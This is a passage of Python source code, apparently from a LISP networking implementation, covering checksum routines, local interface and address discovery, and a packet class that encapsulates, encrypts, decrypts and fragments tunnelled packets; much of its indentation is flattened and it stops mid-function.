# lisp_igmp_checksum
#
# Compute IGMP checksum. This is specialized for a 12-byte IGMP query
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
    # Pack in 2-byte buffer and insert at bytes 2 and 3.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (netifaces.AF_INET not in addresses): return(None)
#
# Find first private address.
#
    return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    for addr in addresses[netifaces.AF_INET]:
        addr_str = addr["addr"]
        return_address.store_address(addr_str)
        if (return_address.is_private_address()): return(return_address)
    #endfor
    return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at the source MAC to see if we are in a loopback
# situation, testing an application and an xTR in the same system.
#
def lisp_get_input_interface(packet):
p = lisp_format_packet(packet[0:12])
macs = p.replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = (sa in lisp_mymacs)
except: my_sa = False
if (da in lisp_mymacs): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp_myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
    #endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
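#
# For example:
#
# >>> lisp_is_mac_string("0050-56b3-4c62")
# True
# >>> lisp_is_mac_string("0050-56b3-4c62/48")
# True
# >>> lisp_is_mac_string("10.1.1.1")
# False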
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
        # Ignore bogus interface names that containers may create. Allow
        # interface names with colons, dashes, and alphanumeric characters.
        #
        d = device.replace(":", "")
        d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (netifaces.AF_LINK not in parms): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get an IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (netifaces.AF_INET in addresses):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (netifaces.AF_INET6 in addresses):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (netifaces.AF_INET in entry):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (netifaces.AF_INET6 in entry):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet(object):
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# Swap UDP port numbers and length field since they are 16-bit values.
#
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
udp_len = socket.htons(self.udp_length)
udp = struct.pack("HHHH", sport, dport, udp_len, self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = b""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = (old_div(length, 16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
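    #
    # For example, a 20-byte payload is padded to 32 bytes; the pad bytes
    # are ASCII spaces added by ljust():
    #
    # >>> len(self.cipher_pad(b"x" * 20))
    # 32
    #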
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
encode_ciphertext = False
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
encode_ciphertext = True
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Chacha produced ciphertext in unicode for py2. Convert to raw-
        # unicode-escape before proceeding, or else you cannot append to strings
# generated from different sources. Do this in do_icv() too.
#
if (encode_ciphertext):
ciphertext = ciphertext.encode("raw_unicode_escape")
#endif
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
        # ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
        # IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
        # Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
        # Call AES or chacha cipher. Make sure for AES-CBC that the
        # ciphertext length is a multiple of 16 bytes.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
        # Now fix the outer IPv4 header of each fragment with fragment-offset
        # and total-length values, and prepend it to the fragment payload.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
            offset += old_div(len(frag), 8)
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
        # logic is semantically replicated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error as e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
        return(True)
    #enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = old_div(frag_field, 8)
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
        # in host byte order, so they have to be byte-swapped here. But when
        # testing we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3:4] + packet[2:3] + \
packet[4:6] + packet[7:8] + packet[6:7] + packet[8::]
else:
packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error as e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
        try:
            bridge_socket = interface.get_bridge_socket()
            if (bridge_socket == None): return
        except: return
        try: bridge_socket.send(self.packet)
        except socket.error as e:
            lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
        #endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9:10])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
